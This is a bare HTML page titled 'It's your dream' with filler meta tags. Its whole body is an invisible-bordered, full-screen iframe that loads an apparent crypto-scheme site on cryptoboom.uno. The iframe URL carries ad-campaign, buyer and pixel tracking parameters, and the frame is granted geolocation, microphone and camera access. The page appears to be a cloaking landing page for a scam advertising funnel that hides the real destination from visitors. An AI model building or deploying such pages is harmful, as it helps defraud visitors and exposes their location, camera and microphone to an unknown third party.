<!DOCTYPE html>

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>It's your dream</title>
    <meta content="fghfg">
    <meta content="qwq">
    <meta content="kkkdfdf">
    <link rel="shortcut icon" href="60006f0860940.png">
    <meta content="summary" name="twitter:card">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <style>body { margin: 0 }</style>
  </head>
  <body>
    <iframe id="" title="test" allowtransparency="true" allowfullscreen="true" allow="geolocation; microphone; camera" src="https://cryptoboom.uno/kypzd6?&camp_id=2&buyer_id=Roma_Lubchenko&account=pl21&pixel=1107704889676785" frameborder="0" style="width: 1px; min-width: 100%; position: absolute; min-height: 100%; border:none;" scrolling="auto">
    </iframe>
  </body>
</html>
